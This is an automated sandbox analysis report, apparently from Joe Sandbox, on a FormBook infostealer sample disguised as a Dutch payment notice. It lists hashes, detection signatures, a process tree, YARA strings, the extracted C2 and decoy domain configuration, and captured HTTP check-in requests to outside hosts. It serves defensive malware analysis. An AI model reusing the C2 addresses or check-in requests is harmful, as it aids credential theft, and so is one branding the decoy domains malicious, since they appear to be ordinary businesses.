
Analysis Report Betaling_advies.exe

Overview

General Information

Sample Name: Betaling_advies.exe
Analysis ID: 383925
MD5: 5011945cdee260fb8688b06568d007b3
SHA1: c0e27a58017d0cf737b86ff3ced063d120f7badd
SHA256: 96bd9ed85e93c31a337a92e99fd6e1966f68f1a28fef43a21da725c36405988c
Tags: exe, Formbook, geoNLD

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Betaling_advies.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\Betaling_advies.exe' MD5: 5011945CDEE260FB8688B06568D007B3)
    • Betaling_advies.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\Betaling_advies.exe' MD5: 5011945CDEE260FB8688B06568D007B3)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6548 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5804 cmdline: /c del 'C:\Users\user\Desktop\Betaling_advies.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.werealestatephotography.com/hw6d/"], "decoy": ["medicare101now.com", "danahillathletics.com", "realjobexpert.com", "boulderhalle-hamburg.com", "idoweddinghair.com", "awdcompanies.com", "thevillaflora.com", "neutrasystems.com", "allwest-originals.com", "designtehengsg.com", "thenewyorker.computer", "ladybugtubs.com", "silina-beauty24.com", "mifangtu.com", "fashionbranddeveloper.com", "istanbulhookah.com", "askyoyo.com", "osaka-computer.net", "conegenie.com", "agteless.com", "carsoncredittx.com", "wellalytics.com", "onjulitrading.com", "thelocallawnmen.com", "loanascustomboutique.com", "ohcaftanmycaftan.com", "ardor-fitness.com", "benzinhayvancilik.com", "apthaiproperty.com", "maxim.technology", "dfch18.com", "davaoaffordablecondo.com", "sueshemp.com", "missmaltese.com", "lakecountrydems.com", "lastminuteminister.com", "sofiascelebrations.com", "socialaspecthouston.com", "rechnung.pro", "kathyscrabhouse.com", "themusasoficial.com", "reversemortgageloanmiami.com", "vrventurebsp.com", "whatalode.com", "xh03.net", "qiqihao.site", "specstrii.com", "organicfarmteam.com", "codebinnovations.net", "kizunaservice.com", "lboclkchain.com", "frorool.com", "dpok.network", "desafogados.com", "vestblue.net", "forguyshere.com", "recordprosperity.info", "theballoonbirds.com", "adityabirla-loan.com", "midgex.info", "qishuxia.com", "panopticop.com", "gd-kangda.com", "hotelbrainclub.com"]}

Yara Overview

Memory Dumps

Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(16 further memory dump entries not shown)

Unpacked PEs

Source: 0.2.Betaling_advies.exe.2680000.1.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C

Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(13 further unpacked PE entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.specstrii.com/hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu, Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (the extracted configuration is listed in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Betaling_advies.exe, ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match, File source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 7.2.colorcpl.exe.4bd7960.5.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.colorcpl.exe.2972508.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Betaling_advies.exe.2680000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Betaling_advies.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.Betaling_advies.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Betaling_advies.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: C:\xampp\htdocs\Cryptor\74d81a217a414a2aaee1ac9ce14525a2\Loader\Loader\Release\22ct3mhbr.pdb source: Betaling_advies.exe, 00000000.00000002.654453331.0000000000788000.00000004.00020000.sdmp, 571kzkbal.dll.0.dr
Source: Binary string: colorcpl.pdbGCTL source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb source: Betaling_advies.exe, 00000001.00000002.692704063.0000000000D70000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Betaling_advies.exe, 00000000.00000003.646799474.000000001EEB0000.00000004.00000001.sdmp, Betaling_advies.exe, 00000001.00000002.692105049.0000000000B2F000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.910878162.00000000047BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Betaling_advies.exe, colorcpl.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.666885783.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_004026BC FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 52.128.23.153:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 52.128.23.153:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 52.128.23.153:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 156.241.53.253:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 156.241.53.253:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 156.241.53.253:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.werealestatephotography.com/hw6d/
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.allwest-originals.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.kathyscrabhouse.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=Vm8u5YrjxPUHM0A3kvgMiq/IEeemHw6XN/VHMXEVDOFWtOJ88rOTM1/2OfHHahCysW3o&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.ladybugtubs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.organicfarmteam.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.neutrasystems.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.specstrii.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=k1LpsGxm5HumkAXpmo5e4u//lFYytVV7DtC0wIWjSrCd2GK6ua7omZNXnIaR8+O4hW3P&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.boulderhalle-hamburg.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.thenewyorker.computer Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.osaka-computer.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.werealestatephotography.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu HTTP/1.1 Host: www.dfch18.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 198.54.117.218
Source: Joe Sandbox View, IP Address: 52.128.23.153
Source: Joe Sandbox View, ASN Name: DOSARRESTUS
Source: Joe Sandbox View, ASN Name: NOCIXUS
Source: unknown, DNS traffic detected: queries for: www.allwest-originals.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 10:39:11 GMT Server: Apache/2.4.46 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.655043939.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: colorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmp, String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: colorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmp, String found in binary or memory: https://www.werealestatephotography.com/hw6d/?DnbLu=um
Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
